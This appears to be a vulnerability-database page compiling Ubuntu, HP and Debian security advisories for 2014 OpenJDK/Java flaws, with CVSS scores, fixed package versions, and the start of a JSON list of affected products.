1053010 - CVE-2014-0411 OpenJDK: TLS/SSL handshake timing issues (JSSE, 8023069) 1053066 - CVE-2014-0423 OpenJDK: XXE issue in decoder (Beans, 8023245) 1053266 - CVE-2013-5896 OpenJDK: com.sun.corba.se. ============================================================================ Ubuntu Security Notice USN-2191-1 May 01, 2014
openjdk-6 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenJDK 6. An attacker could exploit these to cause a denial of service or expose sensitive data over the network. An attacker could exploit these to expose sensitive data over the network. (CVE-2014-0453, CVE-2014-0460)
A vulnerability was discovered in the OpenJDK JRE related to availability. An attacker could exploit this to cause a denial of service. (CVE-2014-0459)
Jakub Wilk discovered that the OpenJDK JRE incorrectly handled temporary files. A local attacker could possibly use this issue to overwrite arbitrary files. In the default installation of Ubuntu, this should be prevented by the Yama link restrictions. (CVE-2014-1876)
A vulnerability was discovered in the OpenJDK JRE related to data integrity. (CVE-2014-2398)
A vulnerability was discovered in the OpenJDK JRE related to information disclosure. An attacker could exploit this to expose sensitive data over the network. (CVE-2014-2403)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 12.04 LTS: icedtea-6-jre-cacao 6b31-1.13.3-1ubuntu1~0.12.04.2 icedtea-6-jre-jamvm 6b31-1.13.3-1ubuntu1~0.12.04.2 openjdk-6-jre 6b31-1.13.3-1ubuntu1~0.12.04.2 openjdk-6-jre-headless 6b31-1.13.3-1ubuntu1~0.12.04.2 openjdk-6-jre-lib 6b31-1.13.3-1ubuntu1~0.12.04.2 openjdk-6-jre-zero 6b31-1.13.3-1ubuntu1~0.12.04.2
Ubuntu 10.04 LTS: icedtea-6-jre-cacao 6b31-1.13.3-1ubuntu1~0.10.04.1 openjdk-6-jre 6b31-1.13.3-1ubuntu1~0.10.04.1 openjdk-6-jre-headless 6b31-1.13.3-1ubuntu1~0.10.04.1 openjdk-6-jre-lib 6b31-1.13.3-1ubuntu1~0.10.04.1 openjdk-6-jre-zero 6b31-1.13.3-1ubuntu1~0.10.04.1
This update uses a new upstream release, which includes additional bug fixes. After a standard system update you need to restart any Java applications or applets to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04398922
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04398922 Version: 1
HPSBUX03091 SSRT101667 rev.1 - HP-UX running Java7, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-08-19 Last Updated: 2014-08-19
Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other vulnerabilities.
References:
CVE-2013-6629
CVE-2013-6954
CVE-2014-0432
CVE-2014-0446
CVE-2014-0448
CVE-2014-0449
CVE-2014-0451
CVE-2014-0452
CVE-2014-0453
CVE-2014-0454
CVE-2014-0455
CVE-2014-0456
CVE-2014-0458
CVE-2014-0459
CVE-2014-0460
CVE-2014-0461
CVE-2014-1876
CVE-2014-2397
CVE-2014-2398
CVE-2014-2401
CVE-2014-2402
CVE-2014-2403
CVE-2014-2409
CVE-2014-2412
CVE-2014-2413
CVE-2014-2414
CVE-2014-2420
CVE-2014-2421
CVE-2014-2422
CVE-2014-2423
CVE-2014-2427
CVE-2014-2428
CVE-2014-2483
CVE-2014-2490
CVE-2014-4208
CVE-2014-4209
CVE-2014-4216
CVE-2014-4218
CVE-2014-4220
CVE-2014-4221
CVE-2014-4223
CVE-2014-4244
CVE-2014-4252
CVE-2014-4262
CVE-2014-4263
CVE-2014-4264
CVE-2014-4265
CVE-2014-4266
CVE-2014-4268
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.09 and earlier.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2013-6629 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-6954 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-0432 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-0446 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2014-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-0451 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0452 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0453 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-0454 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0455 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-0456 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-0458 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-0459 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0460 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2014-0461 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-1876 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4 CVE-2014-2397 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-2398 (AV:N/AC:M/Au:S/C:N/I:P/A:N) 3.5 CVE-2014-2401 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-2402 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2403 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-2409 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2014-2412 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2413 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2014-2414 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2420 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2014-2421 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2014-2422 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-2423 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2428 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2014-2483 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-2490 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4208 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6 CVE-2014-4209 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2014-4216 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4218 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4220 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4221 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-4223 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4244 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-4252 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2014-4262 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2014-4263 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0 CVE-2014-4264 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2014-4265 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4266 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-4268 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these vulnerabilities.
The upgrade is available from the following location: http://www.hp.com/java
OS Version Release Version Depot Name
HP-UX B.11.23, B.11.31 JDK and JRE v7.0.10 or subsequent Itanium_JDK_JRE_7.0.10_Aug_2014_Java70_1.7.0.10.00_HP-UX_B.11.31_IA.depot
MANUAL ACTIONS: Yes - Update For Java v7.0 update to Java v7.0.10 or subsequent
PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.23 HP-UX B.11.31 =========== Jdk70.JDK70-COM Jdk70.JDK70-DEMO Jdk70.JDK70-IPF32 Jdk70.JDK70-IPF64 Jre70.JRE70-COM Jre70.JRE70-IPF32 Jre70.JRE70-IPF32-HS Jre70.JRE70-IPF64 Jre70.JRE70-IPF64-HS action: install revision 1.7.0.10.00 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 19 August 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
For the oldstable distribution (squeeze), these problems have been fixed in version 6b31-1.13.3-1~deb6u1.
For the stable distribution (wheezy), these problems have been fixed in version 6b31-1.13.3-1~deb7u1.
For the testing distribution (jessie), these problems have been fixed in version 6b31-1.13.3-1.
For the unstable distribution (sid), these problems have been fixed in version 6b31-1.13.3-1.
We recommend that you upgrade your openjdk-6 packages
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0374", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jrockit", "scope": "eq", "trust": 2.4, "vendor": "oracle", "version": "r28.3.1" }, { "model": "jrockit", "scope": "eq", "trust": 1.8, "vendor": "oracle", "version": "r27.8.1" }, { "model": "jdk", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.8.0" }, { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "oracle", "version": "1.8.0" }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus client", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus client", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus application server", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus developer professional", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus studio", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus developer", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "05-05" }, { "model": "cosminexus client", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "operational decision manager", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "8.6" }, { "model": "multi-enterprise integration gateway", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "1.0" }, { "model": "operational decision manager", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "8.5" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "1.2" }, { "model": "websphere ilog jrules", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "7.1" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "2.3" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "7.5" }, { "model": "operational decision manager", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "8.0" }, { "model": "websphere business events", "scope": "eq", "trust": 1.1, "vendor": "ibm", "version": "7.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "6.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "junos space", "scope": "lt", "trust": 1.0, "vendor": "juniper", "version": "15.1" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.10" }, { "model": "forms viewer", "scope": "lt", "trust": 1.0, "vendor": "ibm", "version": "4.0.0.3" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "14.04" }, { "model": "forms viewer", "scope": "gte", "trust": 1.0, "vendor": "ibm", "version": "8.0.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.5.0" }, { "model": "jre", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.7.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "jdk", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "1.6.0" }, { "model": "forms viewer", "scope": "gte", "trust": 1.0, "vendor": "ibm", "version": "4.0.0" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "13.10" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "10.04" }, { "model": "forms viewer", "scope": "lt", "trust": 1.0, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "jre 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 21", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 16", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 55", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.5.0 61", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "cosminexus primary server base 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 35", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "cosminexus developer professional 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.7.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 32", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 55", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "-07-00" }, { "model": "jre 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 11", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0 17", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus developer standard 06-70-/f", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 03", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 01", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 28", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.7.0 10", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.6.0 71", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 36", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "ucosminexus client for plug-in", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 61", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "cosminexus application server enterprise 06-00-/e", "scope": null, "trust": 0.9, "vendor": "hitachi", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.7" }, { "model": "jre 1.5.0 29", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 43", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 17", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 16", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.7.0 7", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.7.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 11", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 0 10", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 10", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 27", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 03", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus application server standard )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "06-70" }, { "model": "jdk 1.5.0 24", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 2", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 25", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 24", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk .0 05", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.7.0 13", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 41", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 28", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 15", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jre 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 15", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 32", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 31", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "ucosminexus operator", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "07-00" }, { "model": "jdk 1.7.0 8", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 21", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 37", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "ucosminexus client )", "scope": "eq", 